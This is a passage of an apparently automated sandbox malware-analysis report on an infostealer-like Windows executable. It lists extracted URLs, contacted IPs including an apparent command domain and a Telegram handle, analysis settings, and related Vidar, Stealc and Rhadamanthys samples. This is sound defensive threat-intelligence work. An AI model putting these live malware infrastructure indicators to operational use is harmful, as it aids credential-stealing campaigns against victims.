                                                                                                            https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                		high
                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/Xchrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/_chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://outlook.office.com/mail/compose?isExtension=true5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                      		high
                                                                                                                      http://anglebug.com/6929chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://anglebug.com/5281chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://google-ohttp-relay-join.fastly-edge.com/bchrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://i.y.qq.com/n2/m/index.html5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                              		high
                                                                                                                              https://www.deezer.com/5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                                		high
                                                                                                                                https://issuetracker.google.com/255411748msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://web.telegram.org/5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                                    		high
                                                                                                                                    https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://anglebug.com/7246chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://anglebug.com/7369chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://anglebug.com/7489chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://docs.google.com/presentation/chrome.exe, 0000000F.00000003.2579210853.0000327000F8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://chrome.google.com/webstorechrome.exe, 0000000F.00000003.2550296822.0000327000E88000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2693271301.000074D00238C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2856151475.000028280236C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.24.dr, service_worker_bin_prod.js.24.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://drive-daily-2.corp.google.com/manifest.json0.24.drfalse
                                                                                                                                                    		high
                                                                                                                                                    http://polymer.github.io/PATENTS.txtchrome.exe, 0000000F.00000003.2549261296.00003270006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549336556.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549179677.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547154386.00003270010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549286147.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Procedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://t.me/k04aelm0nk3Mozilla/5.0Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.autoitscript.com/autoit3/XProcedures.com, 0000000B.00000000.2113380186.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp, Night.0.dr, Procedures.com.2.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://issuetracker.google.com/161903006msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.ecosia.org/newtab/Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, P8Q1VA.11.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://drive-daily-1.corp.google.com/manifest.json0.24.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://excel.new?from=EdgeM365Shoreline5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://drive-daily-5.corp.google.com/manifest.json0.24.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://docs.google.com/spreadsheets/chrome.exe, 0000000F.00000003.2590558678.0000327000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577547172.0000327000BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/3078chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/7553chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/5375chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.26.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://anglebug.com/5371chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://anglebug.com/4722chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://m.google.com/devicemanagement/data/apichrome.exe, 0000000F.00000003.2536974657.00003270001C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://permanently-removed.invalid/LogoutYxABmsedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://anglebug.com/7556chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refProcedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://chromewebstore.google.com/msedge.exe, 00000013.00000002.2693271301.000074D00238C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2856151475.000028280236C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.24.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://drive-preprod.corp.google.com/manifest.json0.24.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://srtb.msn.cn/2cc80dabc69f58b6_1.24.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://chrome.google.com/webstore/manifest.json.24.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://bard.google.com/5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.24.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://toptek.sbsosh;Procedures.com, 0000000B.00000002.3157816062.000000000402C000.00000040.00001000.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.000000000414F000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://google-ohttp-relay-join.fastly-edge.com/&chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://browser.events.data.msn.com/2cc80dabc69f58b6_1.24.drfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://anglebug.com/6692chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://issuetracker.google.com/258207403msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://anglebug.com/3502chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://anglebug.com/3623msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://www.office.com5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    http://anglebug.com/3625msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://outlook.live.com/mail/0/5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        http://anglebug.com/3624msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://t.mProcedures.com, 0000000B.00000003.2364719873.0000000001475000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364636371.0000000001445000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364568713.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2363944038.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364636371.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364317456.000000000145C000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2363974153.0000000001475000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            http://anglebug.com/5007chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiUKNGDB.11.drfalse
                                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                                http://anglebug.com/3862chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                                  https://ntp.msn.com/edge/ntp2cc80dabc69f58b6_1.24.drfalse
                                                                                                                                                                                                                                                    		high

                                                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                    23.219.82.75
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                    149.154.167.99
                                                                                                                                                                                                                                                    		t.meUnited Kingdom
                                                                                                                                                                                                                                                    		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                    142.250.181.132
                                                                                                                                                                                                                                                    		www.google.comUnited States
                                                                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    162.159.61.3
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    108.139.47.92
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                    23.209.72.32
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                    20.42.73.24
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                    20.110.205.119
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                    204.79.197.219
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                    142.250.181.65
                                                                                                                                                                                                                                                    		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    172.64.41.3
                                                                                                                                                                                                                                                    		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                                                                    		unknownReserved
                                                                                                                                                                                                                                                    		unknownunknownfalse
                                                                                                                                                                                                                                                    94.130.188.57
                                                                                                                                                                                                                                                    		toptek.sbsGermany
                                                                                                                                                                                                                                                    		24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                                    18.165.220.110
                                                                                                                                                                                                                                                    		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                    		3MIT-GATEWAYSUSfalse

                                                                                                                                                                                                                                                    Private

                                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                                    192.168.2.5
                                                                                                                                                                                                                                                    127.0.0.1

                                                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                    Analysis ID:1579620
                                                                                                                                                                                                                                                    Start date and time:2024-12-23 06:22:10 +01:00
                                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                    Overall analysis duration:0h 8m 31s
                                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                    Number of analysed new started processes analysed:38
                                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                                    Sample name:trZG6pItZj.exe
                                                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                                                    Original Sample Name:1b31c291993985499cf544cc549e9028.exe
                                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@98/292@25/16
                                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                    • Successful, ratio: 98%
                                                                                                                                                                                                                                                    • Number of executed functions: 74
                                                                                                                                                                                                                                                    • Number of non-executed functions: 306
                                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 142.250.181.99, 64.233.162.84, 172.217.19.206, 142.250.181.142, 172.217.17.67, 172.217.19.202, 172.217.19.10, 172.217.19.170, 142.250.181.138, 142.250.181.10, 172.217.17.42, 142.250.181.106, 142.250.181.74, 172.217.17.74, 172.217.19.234, 142.250.181.42, 13.107.42.16, 204.79.197.203, 172.217.17.78, 13.107.21.239, 204.79.197.239, 13.107.6.158, 13.87.96.169, 23.32.238.138, 2.19.198.56, 2.16.158.82, 2.16.158.88, 2.16.158.169, 2.16.158.81, 2.16.158.89, 2.16.158.96, 2.16.158.90, 2.16.158.91, 2.16.158.83, 23.32.238.187, 23.32.238.217, 23.32.238.227, 23.32.238.211, 23.32.238.201, 23.32.238.219, 23.32.238.226, 23.32.238.225, 23.32.238.202, 2.16.158.73, 2.16.158.75, 2.16.158.74, 95.100.135.243, 95.100.135.160, 2.16.158.80, 13.74.129.1, 204.79.197.237, 13.107.21.237, 172.165.61.93, 142.250.80.99, 142.251.40.163, 142.251.32.99, 142.251.41.3, 142.250.80.35, 142.250.65.163, 142.251.40.131, 13.107.246.63, 20.109.210.53, 184.30.17.174, 94.245.104.56,
                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-agic-us-3.uksouth.cloudapp.azure.com, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, arc.msn.com, redirector.gvt1.com, www.bing.com.edgekey.net, th.bing.com, config.edge.skype.com, optimizationguide-pa.googleapis.com, edge-mic
                                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                                    00:23:08API Interceptor1x Sleep call for process: trZG6pItZj.exe modified
                                                                                                                                                                                                                                                    00:23:12API Interceptor1x Sleep call for process: Procedures.com modified

                                                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    162.159.61.3Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                      SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                    QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        23.219.82.75dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
